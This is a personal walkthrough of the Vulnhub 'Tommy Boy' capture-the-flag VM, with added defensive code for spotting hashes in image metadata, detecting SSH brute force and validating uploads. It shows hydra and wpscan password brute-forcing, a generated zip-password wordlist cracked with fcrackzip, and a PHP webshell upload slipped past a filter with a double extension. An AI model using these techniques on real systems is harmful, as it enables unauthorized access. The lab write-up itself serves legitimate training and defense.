Another day, another Vulnhub CTF.

I can see this becoming a bit of an addiction — but it’s a good thing because it’s an addiction which actually stands a chance of materially benefiting me with the new skills I’m picking up. Compared to playing Destiny, for instance. But in fairness that’s not for my benefit — I’m protecting The Last City from the Darkness.

Anyway.

This CTF, Tommy Boy, has been created by Brian Johnson of 7 Minute Security. It was a really fun VM — a few bits of it were fairly easy, some parts of it were really tricky, and there were some pretty neat little tricks in there too. And, running through it was a nice BOFH theme. Niiiice.

SPOILER ALERT

Herein lies a detailed walkthrough of everything I did to crack the VM. If you’re still working on it you should probably stop reading, unless you’re really stuck.

This isn’t necessarily the best or even a good way of breaking this VM, it’s just the way that worked for me.

Flag 1

Standard start — let’s find out where the VM is sat on the NAT-network:

arp-scan -l

Gives us 10.0.2.6.

Next up, let’s see what’s listening:

nmap -A -O -Pn 10.0.2.6

So, of interest we have:

port 22 running SSH

port 80 running http

port 8008 running http

And we’ve got a few interesting links:

6packsofb…soda

lukeiamyourfather

lookalivelowbridge

flag-numero-uno.txt

A quick browse to the port 80 http service shows us what we were told in the narrative:

Let’s grab that first flag:

Flag 1 - B34rcl4ws

Flag 2

What’s in /lukeiamyourfather?

Just sass?

binwalk -B tif.jpg

Yep, just sass.

What about /lookalivelowbridge?

In-joke from the film? Who knows. But there was nothing hidden in this picture either.

Last one — /6packsofb…soda

Again, nothing I’m picking up here but I am sort of getting worried that there might be a bit of ‘insider knowledge’ required from the film — which I haven’t seen. Let’s press on.

My next step was to have a proper scan of the web server.

nikto -h 10.0.2.6

but this just spat out hundreds of hits on folder names — I guess this was a nice deliberate seeding of red herrings. Well played, Mr Johnson!

Next I took a look at the main page again — to see if there’s anything in the source.

Some more sass going on here, some real BOFH shenanigans! But in there is a YouTube link — which looks like it’s from the film — in which a guy simply says “prehistoric forest”.

Browsing to /prehistoricforest gives us…a Wordpress blog!

Since I don’t have an account yet all I can do is really browse through the posts. Looking in the post announcing the company blog we find a reference to Flag 2.

Adding that file name to the blog’s URL gives us the actual flag.

Flag 2 - Z4l1nsky

Flag 3

Let’s keep digging around. Little did I know at this stage that Flag 3 was going to take me an absolute AGE to find.

Another URI to have a peek at.

Another picture which looks like a still from the film. And nothing obvious I can google about it.

I caved and looked up the film and tried to determine if this picture was trying to give me a clue. I played around with the actor name. Tried to find any pertinent quotes, but having not seen the film I was seriously hamstrung.

I contacted the author on Twitter and asked if I needed insider knowledge — thankfully he confirmed that I didn’t, so it’s time to try a bit harder.

A look at the header of the picture file (something I am now in the habit of doing routinely, alongside running binwalk) showed something a little odd: what looked like an MD5 hash (I appear to have built myself an MD5 detector as a result of playing with these CTFs…)

ce154b5a8e59c89732bc25d6a2e6b90b

A hash lookup shows this is the MD5 of ‘spanky’.
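That header check is easy to automate. The following is an added example, not part of the original walkthrough: it walks a JPEG’s marker segments by hand (so it needs neither Pillow nor exiftool) and reports any hex run of MD5, SHA-1 or SHA-256 length found in the COM or APPn metadata segments, which is where a CTF author or a data-smuggler would stash a string. It runs over a constructed in-memory JPEG carrying the hash found above; pass a file path to scan a real picture.

```python
"""Scan a JPEG's metadata segments (COM, APPn such as Exif/XMP) for hash-shaped strings.

Added example, not code from the original walkthrough. The JPEG segment structure is
parsed by hand so this runs offline with the standard library only, and the default
input is a constructed in-memory JPEG rather than the VM's picture.
"""
import re
import struct

COM = 0xFE                      # comment segment
APP_RANGE = range(0xE0, 0xF0)   # APP0..APP15 (JFIF, Exif, XMP, ...)
SOS = 0xDA                      # start of scan: entropy-coded image data follows, stop there
EOI = 0xD9

HASH_SHAPES = {32: "md5-sized", 40: "sha1-sized", 64: "sha256-sized"}
# A run of 32-64 hex digits not touching other hex digits on either side.
HEX_RUN = re.compile(rb"(?<![0-9a-fA-F])([0-9a-fA-F]{32,64})(?![0-9a-fA-F])")


def iter_segments(data):
    """Yield (marker, payload) for each marker segment before the image data."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG (missing SOI)")
    pos = 2
    while pos + 4 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError("lost marker sync at offset %d" % pos)
        marker = data[pos + 1]
        if marker in (SOS, EOI):
            return
        (length,) = struct.unpack(">H", data[pos + 2:pos + 4])   # length counts itself
        yield marker, data[pos + 4:pos + 2 + length]
        pos += 2 + length


def find_hashes(data):
    """Return [(segment_name, hex_string, shape)] for hash-like runs in metadata segments."""
    hits = []
    for marker, payload in iter_segments(data):
        if marker == COM:
            name = "COM"
        elif marker in APP_RANGE:
            name = "APP%d" % (marker - 0xE0)
        else:
            continue
        for m in HEX_RUN.finditer(payload):
            run = m.group(1).decode("ascii")
            shape = HASH_SHAPES.get(len(run))
            if shape:
                hits.append((name, run.lower(), shape))
    return hits


def segment(marker, payload):
    """Build one marker segment with a big-endian length that includes the length field."""
    return b"\xff" + bytes([marker]) + struct.pack(">H", len(payload) + 2) + payload


def build_sample_jpeg(comment):
    """Constructed minimal JPEG: SOI, JFIF APP0, a COM segment, an SOS marker, then EOI."""
    app0 = b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    return (b"\xff\xd8" + segment(0xE0, app0) + segment(COM, comment)
            + b"\xff\xda\x00\x08\x01\x01\x00\x00\x3f\x00" + b"\xff\xd9")


# The hash the walkthrough found in the picture header, placed here in a constructed COM segment.
SAMPLE = build_sample_jpeg(b"ce154b5a8e59c89732bc25d6a2e6b90b")

if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE
    for seg, digest, shape in find_hashes(data):
        print("%s: %s (%s)" % (seg, digest, shape))
```

Running it with no argument reports the constructed sample’s COM segment; with a path it scans that file. Anything it flags is a candidate for a hash lookup, not proof of one, so the shape label is deliberately “md5-sized” rather than “MD5”.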

At the minute the only obvious thing I can think to do with these things is try to log in to the ssh server using guessed names like ‘richard’, ‘michelle’, and ‘nick’. Sadly, none of those are getting me anywhere.

Time for some wpscan then.



root@kali:~# wpscan -e vp -u 10.0.2.6/prehistoricforest
_______________________________________________________________
        __          _______   _____
        \ \        / /  __ \ / ____|
         \ \  /\  / /| |__) | (___   ___  __ _ _ __
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team
                       Version 2.9.1
          Sponsored by Sucuri - https://sucuri.net
   @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________

[+] URL: http://10.0.2.6/prehistoricforest/
[+] Started: Mon Aug 1 12:35:27 2016

[!] The WordPress 'http://10.0.2.6/prehistoricforest/readme.html' file exists exposing a version number
[+] Interesting header: LINK: <http://10.0.2.6/prehistoricforest/wp-json/>; rel="https://api.w.org/"
[+] Interesting header: SERVER: Apache/2.4.18 (Ubuntu)
[+] XML-RPC Interface available under: http://10.0.2.6/prehistoricforest/xmlrpc.php
[!] Includes directory has directory listing enabled: http://10.0.2.6/prehistoricforest/wp-includes/
[+] WordPress version 4.5.3 identified from advanced fingerprinting (Released on 2016-06-21)
[+] WordPress theme in use: twentysixteen - v1.2

[+] Name: twentysixteen - v1.2
 |  Latest version: 1.2 (up to date)
 |  Location: http://10.0.2.6/prehistoricforest/wp-content/themes/twentysixteen/
 |  Readme: http://10.0.2.6/prehistoricforest/wp-content/themes/twentysixteen/readme.txt
 |  Style URL: http://10.0.2.6/prehistoricforest/wp-content/themes/twentysixteen/style.css
 |  Theme Name: Twenty Sixteen
 |  Theme URI: https://wordpress.org/themes/twentysixteen/
 |  Description: Twenty Sixteen is a modernized take on an ever-popular WordPress layout — the horizontal masthe...
 |  Author: the WordPress team
 |  Author URI: https://wordpress.org/

[+] Enumerating installed plugins (only ones with known vulnerabilities) ...

   Time: 00:00:01 <==============================================================================> (1351 / 1351) 100.00% Time: 00:00:01

[+] We found 1 plugins:

[+] Name: akismet
 |  Latest version: 3.1.11
 |  Location: http://10.0.2.6/prehistoricforest/wp-content/plugins/akismet/
[!] We could not determine a version so all vulnerabilities are printed out

[!] Title: Akismet 2.5.0-3.1.4 - Unauthenticated Stored Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8215
    Reference: http://blog.akismet.com/2015/10/13/akismet-3-1-5-wordpress/
    Reference: https://blog.sucuri.net/2015/10/security-advisory-stored-xss-in-akismet-wordpress-plugin.html
[i] Fixed in: 3.1.5

[+] Finished: Mon Aug 1 12:35:32 2016
[+] Requests Done: 1403
[+] Memory used: 138.699 MB
[+] Elapsed time: 00:00:05
root@kali:~#

Nothing there coming from the vulnerable plugin enumeration.

How about users (which I should probably have done earlier, really):



root@kali:~# wpscan -e u -u 10.0.2.6/prehistoricforest
_______________________________________________________________
        __          _______   _____
        \ \        / /  __ \ / ____|
         \ \  /\  / /| |__) | (___   ___  __ _ _ __
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team
                       Version 2.9.1
          Sponsored by Sucuri - https://sucuri.net
   @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________

[+] URL: http://10.0.2.6/prehistoricforest/
[+] Started: Mon Aug 1 12:36:58 2016

[!] The WordPress 'http://10.0.2.6/prehistoricforest/readme.html' file exists exposing a version number
[+] Interesting header: LINK: <http://10.0.2.6/prehistoricforest/wp-json/>; rel="https://api.w.org/"
[+] Interesting header: SERVER: Apache/2.4.18 (Ubuntu)
[+] XML-RPC Interface available under: http://10.0.2.6/prehistoricforest/xmlrpc.php
[!] Includes directory has directory listing enabled: http://10.0.2.6/prehistoricforest/wp-includes/
[+] WordPress version 4.5.3 identified from advanced fingerprinting (Released on 2016-06-21)
[+] WordPress theme in use: twentysixteen - v1.2

[+] Name: twentysixteen - v1.2
 |  Latest version: 1.2 (up to date)
 |  Location: http://10.0.2.6/prehistoricforest/wp-content/themes/twentysixteen/
 |  Readme: http://10.0.2.6/prehistoricforest/wp-content/themes/twentysixteen/readme.txt
 |  Style URL: http://10.0.2.6/prehistoricforest/wp-content/themes/twentysixteen/style.css
 |  Theme Name: Twenty Sixteen
 |  Theme URI: https://wordpress.org/themes/twentysixteen/
 |  Description: Twenty Sixteen is a modernized take on an ever-popular WordPress layout — the horizontal masthe...
 |  Author: the WordPress team
 |  Author URI: https://wordpress.org/

[+] Enumerating plugins from passive detection ...
[+] No plugins found

[+] Enumerating usernames ...
[+] Identified the following 4 user/s:
    +----+----------+-------------------+
    | Id | Login    | Name              |
    +----+----------+-------------------+
    | 1  | richard  | richard           |
    | 2  | tom      | Big Tom           |
    | 3  | tommy    | Tom Jr.           |
    | 4  | michelle | Michelle Michelle |
    +----+----------+-------------------+

[+] Finished: Mon Aug 1 12:37:01 2016
[+] Requests Done: 57
[+] Memory used: 15.766 MB
[+] Elapsed time: 00:00:03
root@kali:~#

Some users! Great news.

Trying the flags I’d found so far as passwords for those users was unsuccessful, and I didn’t have any joy with any of the other clues either.

Running:

wpscan -u 10.0.2.6/prehistoricforest --username tom --wordlist /usr/share/wordlists/rockyou.txt --threads 50

Gave me:

Password for user ‘tom’ is ‘tomtom1’.

Running the same for tommy ran to an hour before I abandoned it — and I didn’t try the others as it seemed like there were diminishing returns.

In the meantime, I logged in to the Wordpress site as ‘tom’ and found this.

A clue saying that his ssh password ends in ‘1938!!’ — that’ll come in useful.

Also worth noting that I can’t log in to ssh as tom using any of the existing passwords or clues I’ve found with this appended to the end.

My next step was to see if this clue about the suffix was enough to get me into the ssh server through some brute forcing. I modified the contents of rockyou.txt (in the /usr/share/wordlists folder on Kali) to append ‘1938!!’ to every entry. My first attempt was a loop of the form for word in $(cat words); do echo $word'1938!!' >> words2; done, but that command substitution expands the entire wordlist into one argument list in memory (and word-splits and glob-expands every entry on the way). Reading the file a line at a time does the same job without either problem:

while IFS= read -r word; do printf '%s1938!!\n' "$word"; done < words > words2

Before the original loop completed I actually ran out of memory — it looked like it got about half way through the input file.

Then I tried:

hydra -s 22 -l tom -P words2 10.0.2.6 ssh

But this got me nothing.
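From the other side of the wire, a hydra run like the one above is loud: every guess lands as a “Failed password” line in the target’s auth.log. The following is an added example, not part of the original walkthrough, of the detection logic a defender would run over those lines: a sliding window per source address that alerts once the failure count crosses a threshold inside the window. The log lines are constructed for the example (the hostname CallahanAutoSrv01 is the VM’s; 10.0.2.15 and 10.0.2.9 are made-up lab addresses), and the regex matches the standard OpenSSH failure message format.

```python
"""Flag password-guessing bursts in sshd auth.log lines with a sliding time window.

Added example, not part of the original walkthrough. The sample lines below are
constructed: the hostname is the VM's, the source addresses are made-up lab addresses.
"""
import re
from collections import defaultdict, deque
from datetime import datetime

# Standard OpenSSH failure line: "Failed password for [invalid user ]<user> from <ip> port <n> ssh2"
FAILED = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def parse_failed(line, year=2016):
    """Return (timestamp, user, ip) for a failed-password line, or None for anything else.
    Syslog timestamps carry no year, so the caller supplies it."""
    m = FAILED.match(line)
    if not m:
        return None
    stamp = " ".join(m.group("ts").split())          # collapse the padded day ("Aug  1")
    ts = datetime.strptime("%d %s" % (year, stamp), "%Y %b %d %H:%M:%S")
    return ts, m.group("user"), m.group("ip")


def detect_bruteforce(lines, threshold=5, window_seconds=60):
    """Return {ip: (sorted usernames tried, time of first alert)} for every source that
    produced `threshold` or more failures inside any `window_seconds` span.
    Each source keeps only the timestamps inside the current window (a deque), so the
    detector stays bounded in memory however long the guessing goes on."""
    recent = defaultdict(deque)
    users = defaultdict(set)
    alerts = {}
    for line in lines:
        parsed = parse_failed(line)
        if parsed is None:
            continue
        ts, user, ip = parsed
        window = recent[ip]
        window.append(ts)
        users[ip].add(user)
        while (ts - window[0]).total_seconds() > window_seconds:   # drop failures that aged out
            window.popleft()
        if len(window) >= threshold and ip not in alerts:
            alerts[ip] = (sorted(users[ip]), ts)
    return alerts


# Constructed sample: a burst from one address, then two slow failures from another.
SAMPLE_LOG = """\
Aug  1 13:02:10 CallahanAutoSrv01 sshd[2101]: Failed password for tom from 10.0.2.15 port 40112 ssh2
Aug  1 13:02:11 CallahanAutoSrv01 sshd[2103]: Failed password for tom from 10.0.2.15 port 40114 ssh2
Aug  1 13:02:11 CallahanAutoSrv01 sshd[2105]: Failed password for invalid user richard from 10.0.2.15 port 40116 ssh2
Aug  1 13:02:12 CallahanAutoSrv01 sshd[2107]: Failed password for tom from 10.0.2.15 port 40118 ssh2
Aug  1 13:02:12 CallahanAutoSrv01 sshd[2109]: Failed password for tom from 10.0.2.15 port 40120 ssh2
Aug  1 13:02:13 CallahanAutoSrv01 sshd[2111]: Accepted password for bigtommysenior from 10.0.2.15 port 40122 ssh2
Aug  1 13:40:00 CallahanAutoSrv01 sshd[2200]: Failed password for michelle from 10.0.2.9 port 50001 ssh2
Aug  1 13:55:00 CallahanAutoSrv01 sshd[2201]: Failed password for michelle from 10.0.2.9 port 50002 ssh2
"""

if __name__ == "__main__":
    for ip, (names, when) in detect_bruteforce(SAMPLE_LOG.splitlines()).items():
        print("%s: burst detected at %s, users tried: %s" % (ip, when.time(), ", ".join(names)))
```

The threshold and window are the knobs: five failures in a minute catches hydra at any sensible thread count, while the two michelle failures fifteen minutes apart stay below the line. The same sliding-window logic applies to the FTP attempts later in this post; only the regex for the daemon’s log line changes.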

A bit defeated I started going back over my old notes for some loose threads.

I remembered that there was a post on the Wordpress site which was password protected so I had a play around with that. Since my brute force attempts weren’t really going anywhere with ssh passwords I didn’t bother trying anything freaky — just going over what I have as solid clues.

It turns out that ‘spanky’ from the ‘richard’ picture was the password here, and now I find this:

This is f’d up. I am currently working to restore the company’s online ordering system, but we are having some problems getting it restored from backup. Unfortunately, only Big Tom had the passwords to log into the system. I can’t find his passwords anywhere. All I can find so far is a note from our IT guy Nick (whose last day was yesterday) saying:

Hey Richy,

So you asked me to do a write-up of everything I know about the Callahan server so the next moron who is hired to support you idiots can get up to speed faster. Here’s everything I know:

You guys are all hopeless sheep :-/

The Callahan Auto Web site is usually pretty stable. But if for some reason the page is ever down, you guys will probably go out of business. But, thanks to *me* there’s a backup called callahanbak.bak that you can just rename to index.html and everything will be good again. IMPORTANT: You have to do this under Big Tom’s account via SSH to perform this restore. Warning: Big Tom always forgets his account password. Warning #2: I screwed up his system account when I created it on the server, so it’s not called what it should be called. Eh, I can’t remember (don’t care) but just look at the list of users on the system and you’ll figure it out.

I left a few other bits of information in my home folder, which the new guy can access via FTP. Oh, except I should mention that the FTP server is super flaky and I haven’t had the time (i.e. I don’t give a fat crap) to fix it. Basically I couldn’t get it running on the standard port, so I put it on a port that most scanners would get exhausted looking for. And to make matters more fun, the server seems to go online at the top of the hour for 15 minutes, then down for 15 minutes, then up again, then down again. Now it’s somebody else’s problem (did I mention I don’t give a rat’s behind?).

You asked me to leave you with my account password for the server, and instead of laughing in your face (which is what I WANTED to do), I just reset my account (“nickburns” in case you’re dumb and can’t remember) to a very, VERY easy to guess password. I removed my SSH access because I *DON’T* want you calling me in case of an emergency. But my creds still work on FTP. Your new fresh fish can connect using my credentials and if he/she has half a brain. Good luck, schmucks! LOL

-Nick

Michelle/Tommy…WTF are we going to do?!?! If this site stays down, WE GO OUT OF BUSINESS!!!1!!1!!!!!!!

-Richard

At this point Pete had been mentioning some kind of mythical FTP server he’d found that I had so far not seen. This explained it! The server goes up/down on 15 minute cycles. So I had obviously been scanning at the wrong times and never saw it.

We also have a clue that the FTP user is ‘nickburns’ with a ‘VERY easy’ password.

Let’s look into the FTP server a bit then.

Running:

nmap -p1-65534 10.0.2.6

finally gave me a result on 65534.

FTP’ing to the server works without hindrance, so now I just need some ‘VERY easy’ passwords.

My first port of call was to google for the most popular passwords and download some files.

Armed with them, I set about brute forcing some more:

hydra -t 1 -l nickburns -P passwords.txt -vV -s 65534 10.0.2.6 ftp

Annoyingly, I spent a whole evening (until waaaay past 12) running 15 minute increments of brute forcing using pretty much all of the ‘common’ files I could find in Kali or on the internet. I ended up running incremental passes through rockyou.txt — and since hydra didn’t want to -R resume, I was removing the entries from the passwords file using vim.

The following day the obviousness of the solution hit me hard in the face: if it’s VERY easy and not in a common password list that means it’s either blank or the same as the user name…

So yep,

nickburns:nickburns

Logging in…

root@kali:~# ftp 10.0.2.6 65534
Connected to 10.0.2.6.
220 Callahan_FTP_Server 1.3.5
Name (10.0.2.6:root): nickburns
331 Password required for nickburns
Password:
230 User nickburns logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
-rw-rw-r--   1 nickburns nickburns      977 Jul 15 02:37 readme.txt
226 Transfer complete
ftp> get readme.txt
local: readme.txt remote: readme.txt
200 PORT command successful
150 Opening BINARY mode data connection for readme.txt (977 bytes)
226 Transfer complete
977 bytes received in 0.00 secs (195.1128 kB/s)

And then cat’ing out the readme.txt file I found:

root@kali:~# cat readme.txt
To my replacement:

If you're reading this, you have the unfortunate job of taking over IT responsibilities from me here at Callahan Auto. HAHAHAHAHAAH! SUCKER! This is the worst job ever! You'll be surrounded by stupid monkeys all day who can barely hit Ctrl+P and wouldn't know a fax machine from a flame thrower!

Anyway I'm not completely without mercy. There's a subfolder called "NickIzL33t" on this server somewhere. I used it as my personal dropbox on the company's dime for years. Heh. LOL. I cleaned it out (no naughty pix for you!) but if you need a place to dump stuff that you want to look at on your phone later, consider that folder my gift to you.

Oh by the way, Big Tom's a moron and always forgets his passwords and so I made an encrypted .zip of his passwords and put them in the "NickIzL33t" folder as well. But guess what? He always forgets THAT password as well. Luckily I'm a nice guy and left him a hint sheet.

Good luck, schmuck! LOL.

-Nick
root@kali:~#

I tried the NickIzL33t folder name under all of the URIs I had but wasn’t getting anywhere, so I decided to have a look at the server on port 8008 — that might be what was meant by the ‘personal dropbox’ server.

And here it is:

Now then, I have to admit that this “Steve Jobs” reference escaped me for FAR too long. Instead I was trying to manually find Apple-related sub-folders which was getting me nowhere.

Turns out it’s frustratingly simple — I just need to appear to be coming from an Apple device to see the files. Cunning.

Yeah, rub it in!

This sounds like a job for dirbuster!

aaaand, FAIL.

WTF? Time passes. I wish I had a beer.

Remember, like, minutes ago when you figured out you need a specific User Agent to access this stuff? Yeah, dumbass.

Remembering: powerful

I took the User Agent string straight out of the User Agent Switcher that I used on Firefox.

I’m not sure what was going on with dirbuster — I think it was the accented characters it was dealing with but it was erroring out a lot and pausing the attack.

I continued to allow it to run a few times which was luckily enough to get a hit:

Note the errors — WTF?

Browsing there gives us tonnes more info:

Firstly, it’s given us Flag 3:

Flag 3 — TinyHead

Flag 4

The encrypted password backup allows me to download a zip file.

Linked alongside it is the hint file:

Big Tom,

Your password vault is protected with (yep, you guessed it) a PASSWORD! And because you were choosing stupidiculous passwords like "password123" and "brakepad" I enforced new password requirements on you...13 characters baby! MUAHAHAHAHAH!!!

Your password is your wife's nickname "bev" (note it's all lowercase) plus the following:

* One uppercase character
* Two numbers
* Two lowercase characters
* One symbol
* The year Tommy Boy came out in theaters

Yeah, fat man, that's a lot of keys to push but make sure you type them altogether in one big chunk ok? Heh, "big chunk." A big chunk typing big chunks. That's funny. LOL

-Nick

Ugh, what a mess. Not sure how to answer that requirement for building a complex password other than through The Hard Way™.

#!/bin/bash
# Generate every candidate matching Nick's hint:
#   bev + one uppercase + two digits + two lowercase + one symbol + 1995
# The symbols live in a quoted array so that *, ?, [ and \ are never glob-expanded
# by the shell (an unquoted $(echo \* \? ...) list would be), and the list runs through
# the printable ASCII symbols in order: the second '<' in my first draft was a typo for '>'.
SYMBOLS=('#' '$' '%' '&' "'" '(' ')' '*' '+' ',' '-' '.' '/' ':' ';' '<' '=' '>' '?' '@' '[' '\' ']' '^' '_' '{' '|' '}' '~')

for UC in {A..Z}; do
  for N in {00..99}; do
    for LC in {a..z}; do
      for L2 in {a..z}; do
        for SY in "${SYMBOLS[@]}"; do
          # printf rather than echo, so a backslash symbol is emitted literally
          printf '%s\n' "bev${UC}${N}${LC}${L2}${SY}1995"
        done
      done
    done
  done
done

I saved this as passgen.sh and then changed its permissions to allow me to run it:

chmod u+x passgen.sh

and then output it into a brute force list for the zip file:

./passgen.sh > bfforzip.txt

This took a loooooong time to output. But there are 68,029,332 entries in the file…

Anyway, I tried to write a simple bash script to automate the application of passwords to the unzip command (against the -P for password flag) but the results were erratic and I couldn’t figure out what was going wrong.

Google told me to use fcrackzip:

root@kali:~/ctf/tommy-boy#

fcrackzip -D -u -p bfforzip.txt ~/Downloads/t0msp4ssw0rdz.zip

PASSWORD FOUND!!!!: pw == bevH00tr$1995

root@kali:~/ctf/tommy-boy#

Woo!

Extracting the zip gives me a passwords.txt file which contains some more details and sass:

root@kali:~/Downloads# cat passwords.txt
Sandusky Banking Site
------------------------
Username: BigTommyC
Password: money

TheKnot.com (wedding site)
----------------------------
Username: TomC
Password: wedding

Callahan Auto Server
----------------------------
Username: bigtommysenior
Password: fatguyinalittlecoat
Note: after the “fatguyinalittlecoat” part there are some numbers, but I don’t remember what they are.
However, I wrote myself a draft on the company blog with that information.

Callahan Company Blog
----------------------------
Username: bigtom(I think?)
Password: ???
Note: Whenever I ask Nick what the password is, he starts singing that famous Queen song.
root@kali:~/Downloads#

Finally! The bloody ssh password for tom! As well as the actual username which was hinted at as being non-standard earlier on.



root@kali:~/Downloads# ssh bigtommysenior@10.0.2.6
bigtommysenior@10.0.2.6's password:
Welcome to Ubuntu 16.04 LTS (GNU/Linux 4.4.0-31-generic x86_64)

 * Documentation:  https://help.ubuntu.com/

143 packages can be updated.
0 updates are security updates.

Last login: Thu Jul 14 13:45:57 2016
bigtommysenior@CallahanAutoSrv01:~$ ll
total 40
drwxr-x--- 4 bigtommysenior bigtommysenior 4096 Jul 8 08:57 ./
drwxr-xr-x 5 root           root           4096 Jul 7 00:17 ../
-rw------- 1 bigtommysenior bigtommysenior    0 Jul 21 17:47 .bash_history
-rw-r--r-- 1 bigtommysenior bigtommysenior  220 Jul 7 00:12 .bash_logout
-rw-r--r-- 1 bigtommysenior bigtommysenior 3771 Jul 7 00:12 .bashrc
drwx------ 2 bigtommysenior bigtommysenior 4096 Jul 7 00:16 .cache/
-rw-r--r-- 1 bigtommysenior bigtommysenior  307 Jul 7 14:18 callahanbak.bak
-rw-rw-r-- 1 bigtommysenior bigtommysenior  237 Jul 7 15:27 el-flag-numero-quatro.txt
-rw-rw-r-- 1 bigtommysenior bigtommysenior  630 Jul 7 17:59 LOOT.ZIP
drwxrwxr-x 2 bigtommysenior bigtommysenior 4096 Jul 7 13:50 .nano/
-rw-r--r-- 1 bigtommysenior bigtommysenior  675 Jul 7 00:12 .profile
-rw-r--r-- 1 bigtommysenior bigtommysenior    0 Jul 7 00:17 .sudo_as_admin_successful
bigtommysenior@CallahanAutoSrv01:~$ cat el-flag-numero-quatro.txt
YAY! Flag 4 out of 5!!!! And you should now be able to restore the Callhan Web server to normal working status.

Flag data: EditButton

But...but...where's flag 5?

I'll make it easy on you. It's in the root of this server at /5.txt
bigtommysenior@CallahanAutoSrv01:~$

Flag 4 — EditButton

Flag 5

I’m pretty sure I read something saying that all I needed to do was to rename the .bak file to index.html and that would restore the main site.

I tried that, but the site remained stubbornly down so I had to go and take a look in the /var/www folder to see what’s up.

Sure enough the index.html file in there wasn’t linked to anywhere so I replaced it with my renamed backup file — et voila!

I think this means we’re back in business :)

But, I still don’t have Flag 5 :(

bigtommysenior@CallahanAutoSrv01:/$ cat .5.txt

cat: .5.txt: Permission denied

bigtommysenior@CallahanAutoSrv01:/$

Also interesting to note that this file was owned by www-data which was a bit odd. Basically, I’m not getting it that way.

However, on my travels in /var I did notice another folder which looked a bit out of place:

/var/thatsg0nnaleaveamark/NickIzL33t/P4TCH_4D4MS

Looks like some kind of file upload functionality with an /uploads/ folder that looks like it has way too much permission going on.

I wonder whether I was supposed to find this folder this way? Maybe, looking back, I was supposed to use something like Burp to brute force subfolders beneath /NickIzL33t/? Who knows, but I’m here anyway.

Browsing to the uploader shows a pretty simple upload page.

I’m able to upload images.

And note that they go into /uploads/, our wildly over-permissioned folder.

Webshell then!

I tried to upload the simple-backdoor.php file

but there was no way.

Or was there?

mv simple-backdoor.php simple-backdoor.php.jpeg

Yep — worked a charm.
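The double-extension trick works because the uploader is deciding “is this an image?” by looking for an image extension somewhere in the name rather than at the end of it. Here is an added example (not the VM’s own upload code, which is not on the page) showing that loose check beside the strict one a defender would want: only the final extension counts and it must be on an allowlist, the file’s magic bytes must agree with it, a script extension anywhere in the name is refused outright, and the stored name is generated server-side so the client’s name never reaches disk.

```python
"""Upload filename checks: the loose check the walkthrough bypassed, beside a strict one.

Added example, not the VM's own upload code. The weak checker reproduces the observed
behaviour (a .php file accepted once renamed to .php.jpeg); the strict checker only
trusts the final extension, verifies magic bytes, and discards the client's name.
"""
import os
import re
import secrets

IMAGE_EXTS = {"jpg", "jpeg", "png", "gif"}

# Leading bytes each allowed type must start with; the extension has to agree with the content.
MAGIC = {
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
}

# Extensions a PHP-enabled web server may execute if they appear anywhere in the name.
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)(\.|$)")


def weak_is_image(filename):
    """Loose check: passes if ANY dotted component is an image extension.
    'simple-backdoor.php.jpeg' passes, which is exactly what happened above."""
    parts = filename.lower().split(".")
    return any(p in IMAGE_EXTS for p in parts[1:])


def strict_accept(filename, content):
    """Return a server-generated filename if the upload is acceptable, else None.

    Rules: only the LAST extension counts and it must be allowlisted; names carrying a
    script extension anywhere are refused; the body must begin with the type's magic
    bytes; and the stored name is random, so nothing the client chose (path components,
    extra extensions) ever lands on disk.
    """
    base = os.path.basename(filename).lower()
    if "." not in base:
        return None
    ext = base.rsplit(".", 1)[1]
    if ext not in IMAGE_EXTS:
        return None
    if SCRIPT_EXT.search(base):
        return None
    if not content.startswith(MAGIC[ext]):
        return None
    return "%s.%s" % (secrets.token_hex(8), ext)


if __name__ == "__main__":
    jpeg_body = b"\xff\xd8\xff\xe0" + b"\x00" * 16        # constructed JPEG-looking body
    php_body = b"<?php echo 'not an image'; ?>"           # constructed stand-in for a script body
    for name, body in [("holiday.jpeg", jpeg_body), ("simple-backdoor.php.jpeg", php_body)]:
        print(name, "weak:", weak_is_image(name), "strict:", strict_accept(name, body))
```

The other half of the fix is where the file goes. Even a strict name check does not help if the upload directory is somewhere the web server will execute PHP from and is writable by other accounts on the box: the rename back to .php over ssh a few lines below only works because /uploads/ allows it. Uploads belong outside the web root, or in a location the server is configured to serve as static content only, owned by the web server user alone.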

Now, back on the ssh account, I rename the file back to .php and I can execute commands (note: spaces need to be encoded as %20 for this to work):

Flag 5 — Buttcrack

Flag 5+1

A bonus flag to crack.

Simple one here — just to check no one’s skipped any steps :)

Concatenating the flag contents gives me:

B34rcl4wsZ4l1nskyTinyHeadEditButtonButtcrack

and unzipping the LOOT.ZIP

And we are home!

Thanks to Brian Johnson for a great CTF.

A few outstanding items on my to-do list that I couldn’t square off, though: